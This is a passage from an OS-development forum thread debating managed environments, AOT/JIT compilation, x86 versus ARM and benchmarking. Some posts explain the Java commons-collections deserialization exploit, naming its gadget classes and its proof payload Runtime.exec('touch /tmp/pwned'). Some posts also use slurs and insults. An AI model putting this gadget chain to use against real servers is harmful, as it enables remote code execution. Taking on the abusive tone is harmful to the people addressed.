Now; what sort if insane retard is going to compile the same code 50000 times and provide all 50000 variations of the native binaries; and do that every single time they release a new version for one OS?

For a "byte code to native" compiler (that runs on the end user's computer and is a built in part of software installation) it'd be trivial for the compiler to auto-detect any details that effect optimisation (just like GCC's "-march=native" does) and create something optimised specifically for that specific computer. In this case, developers only need to provide one executable for all users.

embryo2 wrote:
Brendan wrote:
AOT may or may not be an important part of a managed environment; but this has nothing to do with using 2 AOT compilers (one before software is deployed and the other after/while software is installed by the end user) to solve portability and performance/optimisation and copyright problems in traditional unmanaged toolchains.

You introduce useless entities. It was shown how one AOT can help, your second AOT is useless.


You're a moron. A CPU can't execute portable byte-code, so unless there's a second AOT compiler you end up with slow and bloated JIT puss destroying any hope of acceptable performance that's so bad it doesn't even match the unacceptably poor performance we already get from traditional C/C++ compilers.

embryo2 wrote:
Brendan wrote:
embryo2 wrote:
The best solution is managed environment with many option available including JIT, AOT, hardware protected sessions and of course - the best ever smart compiler.


Can you back this up with logical reasoning?

Every option has advantages. If we can use an advantage we can do our work better. So, it's obvious it's better to have the options that allow us to have advantages. And it's better to have a bag (the environment) for all these options (because it's very impractical to work with every option separately).


The only case where "managed environment" could be considered an advantage is if you're a hardware manufacturer relying on Wirth's law to ensure that consumers are always willing to pay more $ for faster/larger hardware.


Cheers,

Brendan

_________________
For all things; perfection is, and will always remain, impossible to achieve in practice. However; by striving for perfection we create things that are as perfect as practically possible. Let the pursuit of perfection be our guide.


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Wed Nov 11, 2015 11:50 am 
Offline
Member
Member
User avatar

Joined: Fri Oct 27, 2006 9:42 am
Posts: 1925
Location: Athens, GA, USA
embryo2 wrote:
Schol-R-LEA wrote:
Wait a moment, are you claiming that the compiler (as opposed to the editor or IDE) should be not only incorporate a spell checker for strings, but also be able to detect a spelling error in a string (e.g., "Qorld" instead of "World")

There's escaped quotation mark which makes string literal endless.

May be Brendan was kidding giving us double troubled code. Or may be Brendan accidentally made this compiler detectable bug

I overlooked that. I suspect that it was indeed an error, as it looks to me like Brendan dropped an 'n' between the escape and the double quote.

embryo2 wrote:
(despite his claims of being very careful developer).

I don't believe you are serious here. Even if one were to assume that he'd apply the same degree of rigor to a casual forum post as he would to developing production code, 'careful developer' != 'never makes errors in code'. A careful developer is not one that is perfect; a careful developer is one who applies basic software engineering techniques such as external code reviews, unit and integration test suites, stringent compiler error and warning reporting, and code profiling to limit the chances of an error going undetected.

And before you say it, yes, that would include using a managed environment, if it provided any advantages that could not be gained in some other manner. Brendan's argument, which I feel is overstated but correct overall, is that many of the features of managed environments can be achieved in a more effective manner through different means, and that the claims regarding 'managed code' is mostly hype coming from certain software vendors rather than actual provable value.

embryo2 wrote:
Schol-R-LEA wrote:
To be fair, I suspect the Embryo simply chose the page as being the first one found in a Google search on the phrase 'CPU benchmark', without looking critically at what was actually presented or understanding the nuances of benchmarking

Yes. I had no intention to make a thorough examination of many Internet pages just because a tiny percent of them can prove Brendan's point of view.

facepalm You were the one who brought up benchmarking (unless I missed something), so you should at least know what it is you are asserting before you assert it. This isn't a matter of who is right and who is wrong - understanding what benchmarks actually are, their limitations, the ways they can be exploited to misrepresent performance, and most of all how to interpret their results in a useful manner is something basic to performance testing. Any software developer should have some idea of the issues at hand when discussing them.

To be fair, benchmarking seems to be an unfamiliar are for you, so the initial error is understandable. Continuing to defend your lack of knowledge on the basis of an ad hominem argument, however, is simply stubbornness. If you don't have the time or inclination to find out more about the subject, fine, but don't snipe ate Brendan while doing so.

embryo2 wrote:
I see what an ordinary user sees - there's no sane comparison between Intel and ARM processors.

This is precisely the sort of issue that I am talking about, where you are jumping into something on the basis of a general view without getting the details right. While I - and nearly everyone in the world - agrees that the ARM architecture is vastly superior as a design to the x86 architecture (which is widely considered to be just about the worst around), the issues of instruction set, register file size, etc., are only one facet of performance. For historical reasons, x86 has been and continues to be widely used for desktop and server systems, and Intel has put a heroic amount of effort put into squeezing as much performance out of that pile of crap as humanly possible. Even with its wide adoption for embedded and mobile use, ARM has not seen a 1% of that development effort put into it until very recently, and in any case has a lot less room for improvement (which should have been a good thing, but...).

The practical upshot of this is that while ARM (along with other RISC designs such as MIPS, SPARC, or PowerPC, and even other big-CISC designs such as the old 68K series) is a far better design all around, and on the surface should be able to outperform x86 on every imaginable level, in practice x86 has been keeping pace with them and even outperforming them in places despite the fact that everyone, including Intel, wishes to see it dead and buried (Intel has tried to replace the x86 at least three times, the most notorious instance being the Itanic Disaster, but it's been too lucrative for them to pull the plug on it). The whole industry has had a deadpool running on the x86 for two decades, and so far no one has collected, and there's little reason to think any will in the next several years.

To get back to the main issue here, a large part of the goal of both Java and .Net was to make it easier to dislodge the industry from Intel's grip. When Sun designed Java to be 'write once, run everywhere', they were primarily hoping to get people to run on SPARCs - the real purpose of their 'managed environment' was to divert users from relying on a specific hardware platform (though at the time they were thinking more in terms of AS/400s and VAXes than PCs), making it easier to switch ot Sun's hardware platform. Similarly, one of the unstated purposes of .NET was to reduce the dependency of Windows on the Intel hardware, because at the time it looked like x86 wasn't going to get extended any further and Microsoft wanted to be ready to jump to PowerPC or Itanium or what have you once x86 gave up the ghost. When the Itanic hit an iceberg, and AMD pulled a fast one on Intel with AMD64, all those plans got turned upside-down, but the fact remains that in the computer hardware world, the x86 is the friend no one likes.

_________________
Rev. First Speaker Schol-R-LEA;2 LCF ELF JAM POEE KoR KCO PPWMTF
Ordo OS Project
Lisp programmers tend to seem very odd to outsiders, just like anyone else who has had a religious experience they can't quite explain to others.


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Thu Nov 12, 2015 10:38 am 
Offline
Member
Member

Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Octocontrabass wrote:
The payload relies on the fact that the object being unserialized can specify methods to invoke, due to a vulnerability in commons-collections. One of the methods it invokes is Runtime.exec("touch /tmp/pwned").

Payload doesn't rely on anything except the (de)serialization protocol. The protocol, of course, has nothing in common with the invocation of arbitrary methods. First of all - there should be a class and protocol defines what class can expect and what not. The class is found by name. No library is involved here, would it be vulnerable or not. Next, if the JVM has successfully found the class, the protocol defines what method to invoke. This method can contain Java code, including Runtime.exec("touch /tmp/pwned"), but for JVM to execute Runtime.exec("touch /tmp/pwned") it should first find the actual class, where the code contains such line. If you think it's commons collections where JVM can find the Runtime.exec("touch /tmp/pwned"), then you can grep the library for "Runtime" and you'll find there's no code that uses the Runtime class.

And now, when I hope you see the need for the code to be available to the JVM, please, tell me, where the JVM can get it from?
Octocontrabass wrote:
I'm sure the author can explain the vulnerability much better than I can.

Yes, he should be able to tell us how he managed to put malicious class in the server's class path.
Octocontrabass wrote:
embryo2 wrote:
But in fact the author mumbles a bit about "if it's not this way then it's impossible".

Can you specify exactly where the author states this?

It's last sentence in the "vulnerability" section. Search for "it won't".

_________________
My previous account (embryo) was accidentally deleted, so I have no chance but to use something new. But may be it was a good lesson about software reliability :)


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Thu Nov 12, 2015 11:08 am 
Offline
Member
Member

Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Schol-R-LEA wrote:
embryo2 wrote:
(despite his claims of being very careful developer).

I don't believe you are serious here. Even if one were to assume that he'd apply the same degree of rigor to a casual forum post as he would to developing production code, 'careful developer' != 'never makes errors in code'.

The bug issue is very important for the managed vs unmanaged discussion, so Brendan's claim was about an effective almost bug free solution using unmanaged. And one part of the claim was his great personal care for a lot of things including not trusting any hardware. So, when Brendan tells us about the very safe unmanaged solution, which also is due to his personal care, I point to the problem with personal care. And I propose the solution, which requires less personal care. When we see the fact that everybody makes mistakes I think the "more careless" for a programmer solution will prevail.
Schol-R-LEA wrote:
facepalm You were the one who brought up benchmarking (unless I missed something), so you should at least know what it is you are asserting before you assert it.

I assert there's no sane comparison between the ARM and Intel. What's wrong with my assertion? Have you provided any proof I am wrong? I have provided many links, including Brendan's preferred benchmarks, and I see no sane comparison.
Schol-R-LEA wrote:
To be fair, benchmarking seems to be an unfamiliar are for you, so the initial error is understandable. Continuing to defend your lack of knowledge on the basis of an ad hominem argument, however, is simply stubbornness. If you don't have the time or inclination to find out more about the subject, fine, but don't snipe ate Brendan while doing so.

Ok, I can spend a few days and find nothing about sane comparison. What should I do next?

The internal benchmarking kitchen is not familiar to me just because there are many benchmarks. One stresses memory intensive usage, another stresses computation intensive, third stresses something else. If I need to compare something I usually look for readily available benchmarks and there I can see the products, I interested in, compared side by side. And next I can read about benchmark details and as a result I can understand if it is reliable or not. But now I just have no side by side comparison using the same methodology. So, what should I do? Should I write my benchmark an buy ARM and Intel hardware to show they can be compared?
Schol-R-LEA wrote:
Intel has put a heroic amount of effort put into squeezing as much performance out of that pile of crap as humanly possible.

In fact it's simpler. Intel just added a translation layer to it's chips. And every freaky instruction now has it's translated representation which is as efficient as ARM can do. But the translation also costs time, silicon and power. Also Intel's processor internal optimization is weak and while it works at the level of 10 instructions, it won't work for larger instruction queue. So, ARM has a really interesting potential to win this game.
Schol-R-LEA wrote:
To get back to the main issue here, a large part of the goal of both Java and .Net was to make it easier to dislodge the industry from Intel's grip.

It's a disputable version. My view is there's just common understanding of the old principle - simpler is better. So, simpler development pays a lot for Java and .Net and Intel here is almost irrelevant.
Schol-R-LEA wrote:
Microsoft wanted to be ready to jump to PowerPC or Itanium

Recompilation takes much less efforts than creation of a totally different environment (managed).

_________________
My previous account (embryo) was accidentally deleted, so I have no chance but to use something new. But may be it was a good lesson about software reliability :)


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Thu Nov 12, 2015 12:11 pm 
Offline
Member
Member

Joined: Mon Mar 25, 2013 7:01 pm
Posts: 5137
embryo2 wrote:
Next, if the JVM has successfully found the class, the protocol defines what method to invoke. This method can contain Java code, including Runtime.exec("touch /tmp/pwned"), but for JVM to execute Runtime.exec("touch /tmp/pwned") it should first find the actual class, where the code contains such line.

The payload (ab)uses InvokerTransformer to specify an object that must be instantiated by calling the exec method of a Runtime object.

embryo2 wrote:
If you think it's commons collections where JVM can find the Runtime.exec("touch /tmp/pwned"), then you can grep the library for "Runtime" and you'll find there's no code that uses the Runtime class.

Of course, the references to Runtime and exec are also contained in the payload.

embryo2 wrote:
Yes, he should be able to tell us how he managed to put malicious class in the server's class path.

He let the developer do it for him; after all, the malicious class is part of commons-collections. :roll:

If you aren't going to believe me, then ask the author yourself. He can explain it better than I could.

embryo2 wrote:
It's last sentence in the "vulnerability" section. Search for "it won't".

Quote:
The take-away from this is that the “Objects” you see in the code above are the ones required for exploitation. If those aren’t available, this exploit wont work.

The "Objects" it refers to are these:

  • ChainedTransformer
  • ConstantTransformer
  • InvokerTransformer
  • LazyMap

Notice that those are all provided by commons-collections.


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Thu Nov 12, 2015 1:06 pm 
Offline
Member
Member
User avatar

Joined: Fri Oct 27, 2006 9:42 am
Posts: 1925
Location: Athens, GA, USA
embryo2 wrote:
The bug issue is very important for the managed vs unmanaged discussion, so Brendan's claim was about an effective almost bug free solution using unmanaged. And one part of the claim was his great personal care for a lot of things including not trusting any hardware. So, when Brendan tells us about the very safe unmanaged solution, which also is due to his personal care, I point to the problem with personal care. And I propose the solution, which requires less personal care. When we see the fact that everybody makes mistakes I think the "more careless" for a programmer solution will prevail.

And here I can see that you have missed Brendan's point entirely. Brendan is not arguing against managed environments per se (well, he is, but that's actually a side issue to his actual point), but rather that one shouldn't commit to a design feature without knowing ahead of time that it provides a measurable advantage. What he has said time and again is not this is wrong and always will be wrong, but rather, where is the advantage in it? All you need to do is go through the numbers and demonstrate that there are advantages to a managed system that cannot be achieved through an unmanaged system - something he would argue that you should have already done anyway before committing to this course of action.

Furthermore, both of you seem to have missed (or are ignoring) my main point, which is that you are arguing at cross purposes, and that the reason that is happening is that you haven't agreed on your terminology. I would add that as far as I can tell, no one in this debate - not you, not Brendan, not Sun/Oracle, not Microsoft, not any of those on this hype train for or against - has taken the time to pin down what the terms 'managed code' and 'managed environment' ACTUALLY MEAN, in a way that is both consistent and which everyone (more or less) can agree upon, meaning that literally none of you know what you are talking about. Define your damn terms!

If you can't, then guess what? That tells me that the terms don't mean anything. Prove to me that they are something more than marketing, and then we can talk. Better still, both of you write down on different web pages (or wiki entries or Gists or what have you) what YOU think the terms mean, and what terms are relevant to the conversation, without looking at what the other one wrote for at least 24 hours, then let's see if you two are actually talking about anything like the same things.

embryo2 wrote:
Schol-R-LEA wrote:
facepalm You were the one who brought up benchmarking (unless I missed something), so you should at least know what it is you are asserting before you assert it.

I assert there's no sane comparison between the ARM and Intel.

I agree, and would go so far as to say no such comparison can be made, for a number of reasons, starting with - once again - the lack of any clear idea of what a 'sane comparison' would look like.

There are plenty of reasons why an apples to oranges comparison of the two cannot be made of some aspects of the two designs, no question. That's pretty much true of any two unrelated processor architectures. However, since we don't know just what it is you intend to compare, we can't even say if it is possible or not.

embryo2 wrote:
Have you provided any proof I am wrong?

You do understand that it is the person making a claim who holds the burden of proof, don't you? That's one of the cornerstones of both the scientific method and general engineering.

embryo2 wrote:
Schol-R-LEA wrote:
To be fair, benchmarking seems to be an unfamiliar are for you, so the initial error is understandable. Continuing to defend your lack of knowledge on the basis of an ad hominem argument, however, is simply stubbornness. If you don't have the time or inclination to find out more about the subject, fine, but don't snipe ate Brendan while doing so.

Ok, I can spend a few days and find nothing about sane comparison. What should I do next?

Once again, you have missed my point - you need to understand what a benchmark is, and what the limitations of benchmarks in general are, in order to interpret them meaningfully. From what you have said, you don't seem to know these things, but are still trying to use benchmarks to support your case (or at least asking for benchmarks that would be relevant to it). You need to perform due diligence before you even can argue that issue effectively.

embryo2 wrote:
Schol-R-LEA wrote:
Intel has put a heroic amount of effort put into squeezing as much performance out of that pile of crap as humanly possible.

In fact it's simpler. Intel just added a translation layer to it's chips. And every freaky instruction now has it's translated representation which is as efficient as ARM can do. But the translation also costs time, silicon and power. Also Intel's processor internal optimization is weak and while it works at the level of 10 instructions, it won't work for larger instruction queue. So, ARM has a really interesting potential to win this game.

First, AFAIK, that has always been true of the x86 processors since the 8086 - they have all used a layer of microcode and/or a translation engine over a simpler (inaccessible but definitely present) load/store hardware implementation.

Second, as I have already said, I agree - everybody agrees - that the x86 is a shitty design and that ARM (or any of several other designs) would be a better choice. The problem isn't the hardware, it's the software, and the effort it would take to either port the code or develop a software emulator that would perform adequately while supporting a sufficient portion of the existing code base, or some combination of the two. Apple had managed to pull it off during the transition from 68K to PowerPC, and again from PowerPC to x86, but it was rocky, and they only managed it because they had a tight rein on both the hardware and software platforms from the very beginning (and far fewer misbehaving or quirky programs to dispose of).

It is something like a Mexican standoff: for better or worse, Microsoft has been delaying the reckoning they know is coming on this matter, and until they act, the larger PC manufacturers will keep focusing their efforts on cheap PCs regardless of the long-term fallout because that's what their competitors are doing, and the software developers will keep doing things that misuse both the hardware and the OS in non-portable ways because they need an edge over their competitors. Until one of them changes what they are doing, the other two have to keep at it, too, or risk losing everything.

embryo2 wrote:
Schol-R-LEA wrote:
To get back to the main issue here, a large part of the goal of both Java and .Net was to make it easier to dislodge the industry from Intel's grip.

It's a disputable version. My view is there's just common understanding of the old principle - simpler is better. So, simpler development pays a lot for Java and .Net and Intel here is almost irrelevant.

What I said wasn't opinion, it's a matter of historical record. While they never admitted those goals officially, several developers from both MS and Sun have come forward to say that reducing hardware vendor lock-in was among the (many) design goals of both systems.

embryo2 wrote:
Schol-R-LEA wrote:
Microsoft wanted to be ready to jump to PowerPC or Itanium

Recompilation takes much less efforts than creation of a totally different environment (managed).

What.

/me stares in shock at what Embryo just wrote

You're an OS developer. You should know that, managed or otherwise, a lot more goes into porting an OS - even one designed for portability - to a new hardware platform than just recompiling. A lot more.

Windows wasn't designed with portability in mind, especially after Microsoft killed the support for Alpha and SPARC based servers. If Microsoft put everything else on hold and shifted their entire development staff to porting Windows 10 and all their utilities, development tools, applications, etc., to ARM (or any other platform), it would still take them two or three years of work - and they would have to get every single hardware and software vendor on board with them before they committed to doing it, or it would be the Itanic all over again. While they know that the x86-64 hardware will eventually need to be replaced, they cannot afford to make that jump until the last possible moment. I wish it were otherwise, and so do they, but that's the reality of it.

Yes, shifting to a managed environment would take a comparable effort, I agree, but the advantage of doing so is that it can be done piecemeal, in stages, without having to take an irreversible leap into the unknown. By moving a large part of their development work and that of their clients to .NET, they were trying to amortize the costs of that shift over a period of several years, as well as reduce the risks - if something catastrophic happened to block the hand-over, they would still have the old platform to fall back on for a while, and the effort wouldn't be wasted when they re-targeted to some other new platform. But - and this is the point Brendan is making - they knew from the start that there would be a price to pay for it, and they have fought tooth and nail to get their clients to pay that price.

_________________
Rev. First Speaker Schol-R-LEA;2 LCF ELF JAM POEE KoR KCO PPWMTF
Ordo OS Project
Lisp programmers tend to seem very odd to outsiders, just like anyone else who has had a religious experience they can't quite explain to others.


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Fri Nov 13, 2015 7:35 am 
Offline
Member
Member

Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Octocontrabass wrote:
embryo2 wrote:
Next, if the JVM has successfully found the class, the protocol defines what method to invoke. This method can contain Java code, including Runtime.exec("touch /tmp/pwned"), but for JVM to execute Runtime.exec("touch /tmp/pwned") it should first find the actual class, where the code contains such line.

The payload (ab)uses InvokerTransformer to specify an object that must be instantiated by calling the exec method of a Runtime object.

Can you specify the way it uses? I see only some magic there, but no sane algorithm. In my case the algorithm is simple - JVM loads a class which name it gets in the payload, but your algorithm can work only if some magic is present. Specifically - how exactly the payload (ab)uses the InvokerTransformer to specify an object that must be instantiated? Your version "by calling the exec method of a Runtime object" was disproved by the commons collections source code grep for "Runtime".
Octocontrabass wrote:
Of course, the references to Runtime and exec are also contained in the payload.

Ok, the payload can contain any text, but what's next? How any text can be transformed in very specific actions? Please, tell me, I still see here only some magic and nothing more.
Octocontrabass wrote:
embryo2 wrote:
Yes, he should be able to tell us how he managed to put malicious class in the server's class path.

He let the developer do it for him; after all, the malicious class is part of commons-collections. :roll:

If you are so sure about it then why I'm still not seeing your algorithm of the some magic? How it works? Where are the martians who convert payload strings in form of a code?
Octocontrabass wrote:
If you aren't going to believe me, then ask the author yourself. He can explain it better than I could.

His explanation will be - I just put the malicious class in the server's class path.
Octocontrabass wrote:
embryo2 wrote:
It's last sentence in the "vulnerability" section. Search for "it won't".

Quote:
The take-away from this is that the “Objects” you see in the code above are the ones required for exploitation. If those aren’t available, this exploit wont work.

The "Objects" it refers to are these:

  • ChainedTransformer
  • ConstantTransformer
  • InvokerTransformer
  • LazyMap

Notice that those are all provided by commons-collections.

Have you noticed the enclosing object?

_________________
My previous account (embryo) was accidentally deleted, so I have no chance but to use something new. But may be it was a good lesson about software reliability :)


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 140 posts ]  Go to page Previous  1 ... 4, 5, 6, 7, 8, 9, 10  Next

All times are UTC - 6 hours


Who is online

Users browsing this forum: No registered users and 101 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group